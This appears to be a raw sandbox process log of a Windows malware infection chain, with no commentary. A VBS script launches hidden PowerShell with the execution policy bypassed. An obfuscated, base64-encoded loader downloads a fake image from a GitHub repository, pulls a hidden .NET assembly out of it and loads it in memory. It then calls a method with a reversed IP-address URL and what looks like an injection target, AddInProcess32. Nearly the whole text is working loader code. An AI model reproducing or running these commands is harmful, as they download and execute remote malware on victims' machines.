wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\mandayyyyxxxMPDW-constraints.vbs
184powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc5R3ppbWEnKydnZVVybCA9IGZ3aWh0dHBzOi8vcmEnKyd3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0EnKyduZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyBmd2k7OScrJ0d6d2ViQ2xpZW50ID0gTmV3LU9iamUnKydjdCBTeXN0ZW0uTmUnKyd0LldlYkNsaWVudDs5R3ppbWFnZUJ5dGVzID0gOUd6d2ViQ2xpZW4nKyd0LkRvdycrJ25sb2FkRGF0YSg5R3ppbWFnZVVybCk7OUd6aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbicrJ2coOUd6aW1hZ2VCeXRlcyk7OUd6c3RhcnRGbGFnID0gZndpPDxCQVNFNjRfU1RBUlQ+PmZ3aTs5R3plbmRGbGFnID0gZndpPDxCQVNFNjRfRU5EPj5md2k7OUd6c3RhcnRJbmRleCcrJyA9IDlHemltYWdlVGV4dC5JbmRleE9mKDlHenN0YXJ0RmxhZyk7OUd6ZW5kSW5kZXggPSA5R3ppbWFnZVRleHQuSW5kZXhPZig5R3plbmQnKydGbGFnKTs5R3pzdGFydCcrJ0luJysnZGV4IC1nZSAwIC1hbmQgOUd6ZW5kSScrJ25kZXggLWd0IDlHenN0YXJ0SW5kZXg7OUd6c3RhcnRJbmRleCArPSA5JysnR3pzdGFydEZsYWcuTGVuZ3RoOzlHemJhc2U2NExlbmd0aCA9IDlHemVuZEluZGV4IC0gOUd6c3RhcnRJbmRleDs5R3piYXNlNjRDb21tYW5kID0gOUd6aW1hZ2VUZXh0LlN1YnN0cmluZyg5R3pzdGFydEluZGV4LCA5R3piYXNlNjQnKydMZW5ndGgpOzlHemNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoOUd6YmFzZTY0Q29tbWFuZCk7OUd6bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDlHemNvJysnbW1hbmRCeXRlcyk7OUd6dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldCcrJ2hvZChmd2lWQUlmd2kpJysnOzlHenZhaU1ldGhvZC5JbnZva2UoOUd6bnVsbCwgQChmd2l0eHQuNDQ0NDZlc2FiYmJiYmJld21hZGFtLzQzMS44NzEuNjQuODkxLy86cHR0aGZ3aSwgZicrJ3dpZGVzYXRpdmFkb2Z3aSwgZncnKydpZGVzYXRpdmFkb2Z3aSwgZndpZGVzYXRpdmFkb2Z3aSwgZndpQWRkSW5Qcm9jZXNzMzJmd2ksIGZ3aWRlc2F0aXZhZG9md2ksIGZ3aWRlc2F0aXZhZG9md2kpKTsnKS5yRVBMQWNlKChbQ0hBcl0xMDIrW0NIQXJdMTE5K1tDSEFyXTEwNSksW1NUUmlOZ11bQ0hBcl0zOSkuckVQTEFjZSgnOUd6JyxbU1RSaU5nXVtDSEFyXTM2KSB8LigoR3YgJyptZHIqJykubkFtZVszLDExLDJdLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
2084powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('9Gzima'+'geUrl = fwihttps://ra'+'w.githubusercontent.com/CryptersA'+'ndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg fwi;9'+'GzwebClient = New-Obje'+'ct System.Ne'+'t.WebClient;9GzimageBytes = 9GzwebClien'+'t.Dow'+'nloadData(9GzimageUrl);9GzimageText = [System.Text.Encoding]::UTF8.GetStrin'+'g(9GzimageBytes);9GzstartFlag = fwi<<BASE64_START>>fwi;9GzendFlag = fwi<<BASE64_END>>fwi;9GzstartIndex'+' = 9GzimageText.IndexOf(9GzstartFlag);9GzendIndex = 9GzimageText.IndexOf(9Gzend'+'Flag);9Gzstart'+'In'+'dex -ge 0 -and 9GzendI'+'ndex -gt 9GzstartIndex;9GzstartIndex += 9'+'GzstartFlag.Length;9Gzbase64Length = 9GzendIndex - 9GzstartIndex;9Gzbase64Command = 9GzimageText.Substring(9GzstartIndex, 9Gzbase64'+'Length);9GzcommandBytes = [System.Convert]::FromBase64String(9Gzbase64Command);9GzloadedAssembly = [System.Reflection.Assembly]::Load(9Gzco'+'mmandBytes);9GzvaiMethod = [dnlib.IO.Home].GetMet'+'hod(fwiVAIfwi)'+';9GzvaiMethod.Invoke(9Gznull, @(fwitxt.44446esabbbbbbewmadam/431.871.64.891//:ptthfwi, f'+'widesativadofwi, fw'+'idesativadofwi, fwidesativadofwi, fwiAddInProcess32fwi, fwidesativadofwi, fwidesativadofwi));').rEPLAce(([CHAr]102+[CHAr]119+[CHAr]105),[STRiNg][CHAr]39).rEPLAce('9Gz',[STRiNg][CHAr]36) |.((Gv '*mdr*').nAme[3,11,2]-joIn'')"
2208